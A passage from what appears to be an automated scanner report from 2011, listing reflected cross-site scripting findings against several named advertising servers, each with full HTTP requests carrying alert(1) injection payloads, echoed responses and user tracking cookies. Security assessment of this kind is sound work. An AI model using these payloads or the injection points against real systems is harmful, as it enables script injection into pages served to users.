Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:52 GMT
Expires: Tue, 08 Mar 2011 11:59:52 GMT
Connection: close

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;46537204;4307-300/250;0/0/0;;~okv=;25dd4'-alert(1)-'524a5a4183f=1;bsg=3004;bsg=3017;;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bcfe"-alert(1)-"519b47b4f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=1597598&6bcfe"-alert(1)-"519b47b4f9c=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=23d97e10-394a-11e0-a408-001b24935f22&_hmacv=1&_salt=3386971552&_keyid=k1&_hmac=386c7ba4901acee5aa0724e9ce3af05518ef0c8b; pv1="b!!!!.!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#R%`!!!v!!$P2D!0con!$q^.!!H<'!#W(2)HM3:!ZmB)!'%%+!%g*K~~~~~~<pv08<qtnR!!!([!!qy:!!!%O!#26@!0QKk!$6[3~!#My1)eIbA!?vQ,!$%GC~~~~~~~<pk#S<qibm!!!([!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#P,C!-8F-!$V-H!0.2@!$u#J!!!!$!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqfN<qpLh!!!([!!LV3!-8F-!$V-H!,Dln!$tyI!!H<)!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqk'<qpQA!!!(["; ih="b!!!!?!%?RR!!!!#<pqk,!%?m7!!!!#<p]i+!'cGC!!!!#<nQH-!'cKt!!!!$<nQH1!(4uP!!!!#<p^*H!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,@lO!!!!#<nQHP!,@rl!!!!%<nQHf!,@s)!!!!#<nQHQ!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg"; cafb=/)2(Js!!94KE2!IIkB/eII<Uu; bh="b!!!%*!!!?I!!!!,<q)L@!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!/<q)L@!!*oY!!!!%<pN)4!!+Vp!!!!#<pqhD!!-?2!!!!*<pN)4!!-L3!!!!#<pqhD!!-LP!!!!#<pqhD!!-Oo!!!!#<nsgt!!/DA!!!!/<q)L@!!/Hd!!!!.<q)L@!!/He!!!!.<q)L@!!/j$!!!!%<nTlW!!/pv!!!!#<pqhD!!0O0!!!!#<pqhD!!1CD!!!!#<p]be!!1Mv!!!!'<nZs,!!1N=!!!!$<nZs,!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!1<q)L@!!3)?!!!!1<q)L@!!3)C!!!!1<q)L@!!4@a!!!!#<q)L?!!4oZ!!!!#<nA,w!!?VS!!7(q<o_%.!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N8v!!!!#<pqhD!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!#<q)L@!!Ra#!!!!#<q)L@!!Ra)!!!!#<q)L@!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!!bu:!!!!)<pjWE!!g]F!!!!#<pqhD!!itb!!!!2<q)L@!!j,.!!<NC<nYX3!!jW8!!!!)<pjWE!!nAU!!!!#<pqhD!!pkJ!!!!2<q)L@!!pkL!!!!2<q)L@!!qrq!!!!2<q)L@!!qrr!!!!2<q)L@!!qrv!!!!2<q)L@!!qyo!!!!.<q)L@!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uhi!!!!#<pqhD!!waQ!!!!#<pqhD!!xw:!!!!#<pqhD!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq?!!!!#<pOO/!##ah!!!!#<pqhD!#(mB!!!!#<pryM!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0mN!!!!#<nAwa!#16I!!<NC<nYX3!#17A!!7(q<o_%.!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#3pw!!!!#<pryM!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#5(c!!!!#<piFJ!#5f*!!!!#<p2A7!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#C-Y!!!!#<q*sU!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#L*a!!!!2<q)L@!#LI/!!!!#<p]be!#MTC!!!!2<q)L@!#MTF!!!!)<pv/h!#MTH!!!!2<q)L@!#MTI!!!!2<q)L@!#MTJ!!!!2<q)L@!#M]c!!!!)<pjWE!#O60!!!!#<nAwa!#O@M!!<NC<nYX3!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+/!!!!)<pjWE!#Q+^!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Qh8!!!!#<pryM!#QhF!!!!#<q*sU!#QpI!!!!/<q)L@!#QpJ!!!!/<q)L@!#QpL!!!!/<q)L@!#QpS!!!!/<q)L@!#QpU!!!!/<q)L@!#RU?!!!!2<q)L@!#RUA!!!!2<q)L@!#RY.!!!!)<pjWE!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#SEW!!!!#<p2A7!#Sq>!!!!#<nrb9!#T-b!!!!2<q)L@!#TnE!!!!2<q)L@!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!-<q)L@!#U@x!!!!-<q)L@!#UA$!!!!-<q)L@!#UDQ!!!!)<pv/h!#UW*!!!!#<pryM!#V,1!!!!#<pqhD!#VRb!!!!#<nAv7!#XA!!!!!)<pjWE!#XI9!!!!#<q)LA!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#[Qv!!!!#<pqhD!#]#G!!!!#<pqev!#](K!!!!#<o,+N!#]Ub!!!!0<q)L@!#]Uc!!!!0<q)L@!#]Ud!!!!0<q)L@!#]Ue!!!!0<q)L@!#]Uf!!!!0<q)L@!#]Ug!!!!0<q)L@!#]Uh!!!!0<q)L@!#]Ui!!!!0<q)L@!#]Uj!!!!0<q)L@!#]Uk!!!!0<q)L@!#]Ul!!!!0<q)L@!#]Um!!!!0<q)L@!#]Un!!!!0<q)L@!#]Uo!!!!0<q)L@!#]Up!!!!0<q)L@!#]Us!!!!0<q)L@!#]Uy!!!!0<q)L@!#]W%!!!!)<pjWE!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!%<pv/h!#]w<!!!!%<pv/h!#]wX!!!!%<pv/h!#]w[!!!!%<pv/h!#]wf!!!!%<pv/h!#]wp!!!!%<pv/h!#^Bo!!!!)<pjWE!#^c@!!!!)<pv/h!#^cm!!!!)<pv/h!#^f#!!!!.<q)L@!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#cAT!!!!#<q*to!#dX>!!!!#<o`%d!#eU%!!!!)<pjWE!#e_K!!!!$<pqfP!#f8c!!!!)<pjWE!#f__!!!!#<pd^@!#g)H!!!!)<pv/h!#g)I!!!!)<pv/h!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!)<pv/h!#g)P!!!!)<pv/h!#g)Q!!!!)<pv/h!#g)R!!!!)<pv/h!#g)S!!!!)<pv/h!#g)T!!!!)<pv/h!#g)U!!!!)<pv/h!#g)V!!!!)<pv/h!#g)W!!!!)<pv/h!#g)X!!!!)<pv/h!#g)Y!!!!)<pv/h!#g)Z!!!!)<pv/h!#g)[!!!!)<pv/h!#g)]!!!!)<pv/h!#g)^!!!!)<pv/h!#gHm!!!!)<pjWE!#g[h!!!!)<pjWE!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!)<pv/h!#gb5!!!!0<q)L@!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#l*=!!!!)<pjWE!#nEj!!!!0<q)L@!#p#H!!!!)<pjWE!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!0<q)L@!#qF%!!!!)<pv/h!#qF'!!!!)<pv/h!#qUW!!!!0<q)L@!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!0<q)L@!#sXy!!!!$<pv+`!#so_!!!!#<p]be!#t:@!!!!$<nZs,!#tM)!!!!(<pv/h!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#uJR!!!!%<pv/h!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!0<q)L@!#w!A!!!!0<q)L@!#w!B!!!!0<q)L@!#w!C!!!!0<q)L@!#w!D!!!!0<q)L@!#w!F!!!!0<q)L@!#w!G!!!!0<q)L@!#w!I!!!!0<q)L@!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#xI*!!!!)<pjWE!#xUM!!!!*<q)L@"; BX=6l13v316lnh2l&b=4&s=8i&t=47

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 00:58:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 08 Mar 2011 00:58:21 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?6bcfe"-alert(1)-"519b47b4f9c=1&Z=160x600&s=1597598&_salt=2079337496";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad3.liverail.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b52ff<a>25841ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?b52ff<a>25841ea6f9=1 HTTP/1.1
Host: ad3.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lr_uid=98718040;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Tue, 08 Mar 2011 12:00:03 GMT
Server: lighttpd/1.4.26-devel-3M
Content-Length: 184

<?xml version="1.0" encoding="utf-8"?>
<liverail content='error' version='3.0-10.194.157.219'><message>Publisher ID missing (/1//10.194.157.219/b52ff<a>25841ea6f9)</message></liverail>

1.32. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73547'%3balert(1)//76e8989e0ad was submitted in the admeld_adprovider_id parameter. This input was echoed as 73547';alert(1)//76e8989e0ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7873547'%3balert(1)//76e8989e0ad&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; rt_14000=2; rt_14200=2; rt_15900=2; rt_17100=2; rt_19000=2; DotomiUser=330200604563575498$0$875515842; DotomiRR2018=-1$11669$1$; DotomiNet=2$DjQqblZ1RXVBDW1dBgd8WgBHKSpAJ25FCVxoWiwcJzNkew0OAQhAWwIPV0JcHwkeC2BYem5uVnVFdUENbV0GB3xaAEcjPFl7AFNdDCQGPRwoPwl9Cg4BBEJcAgdRQEtCRFtjZVpoNiETe0RzSw1gWwMEc1wCU3xvWDRSSgpJNAYWGA8qLj9mCgUIS1IDBVZFT05IXGZqXn5tdwQ1AXxCEDAMR1MUXwNVeXZiL0IeTQIiQwcBIBBkfwgACAhAXwIAXkRISElbZmVPKDsnBhkQOQJrZl8AAHZd; DotomiSession=1_330200604563575498$0$875515842$21657678$2736

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:57 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 201

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=7873547';alert(1)//76e8989e0ad&external_user_id=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&expiration=1300672197" alt="" />')
...[SNIP]...

1.33. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 556cc'%3balert(1)//67076682b5c was submitted in the admeld_callback parameter. This input was echoed as 556cc';alert(1)//67076682b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match556cc'%3balert(1)//67076682b5c HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; rt_14000=2; rt_14200=2; rt_15900=2; rt_17100=2; rt_19000=2; DotomiUser=330200604563575498$0$875515842; DotomiRR2018=-1$11669$1$; DotomiNet=2$DjQqblZ1RXVBDW1dBgd8WgBHKSpAJ25FCVxoWiwcJzNkew0OAQhAWwIPV0JcHwkeC2BYem5uVnVFdUENbV0GB3xaAEcjPFl7AFNdDCQGPRwoPwl9Cg4BBEJcAgdRQEtCRFtjZVpoNiETe0RzSw1gWwMEc1wCU3xvWDRSSgpJNAYWGA8qLj9mCgUIS1IDBVZFT05IXGZqXn5tdwQ1AXxCEDAMR1MUXwNVeXZiL0IeTQIiQwcBIBBkfwgACAhAXwIAXkRISElbZmVPKDsnBhkQOQJrZl8AAHZd; DotomiSession=1_330200604563575498$0$875515842$21657678$2736

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:17 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 201

document.write('<img src="http://tag.admeld.com/match556cc';alert(1)//67076682b5c?admeld_adprovider_id=78&external_user_id=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&expiration=1300672217" alt="" />')
...[SNIP]...

1.34. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213a1'-alert(1)-'e329b3b055a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:58:40 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&external_user_id=4470455573253905340&expiration=0" width="0" height="0"/>');

1.35. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9729'-alert(1)-'28e4793a760 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 02:02:38 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760?admeld_adprovider_id=193&external_user_id=4470455573253905340&expiration=0" width="0" height="0"/>');

1.36. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f21'%3balert(1)//e154bfaf813 was submitted in the admeld_adprovider_id parameter. This input was echoed as 70f21';alert(1)//e154bfaf813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7370f21'%3balert(1)//e154bfaf813&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2tm6jj5l0la

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:49:40 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:49:40 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=7370f21';alert(1)//e154bfaf813&external_user_id=3346767141746773094"/>');

1.37. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac52f'%3balert(1)//d88f1d56111 was submitted in the admeld_callback parameter. This input was echoed as ac52f';alert(1)//d88f1d56111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac52f'%3balert(1)//d88f1d56111 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
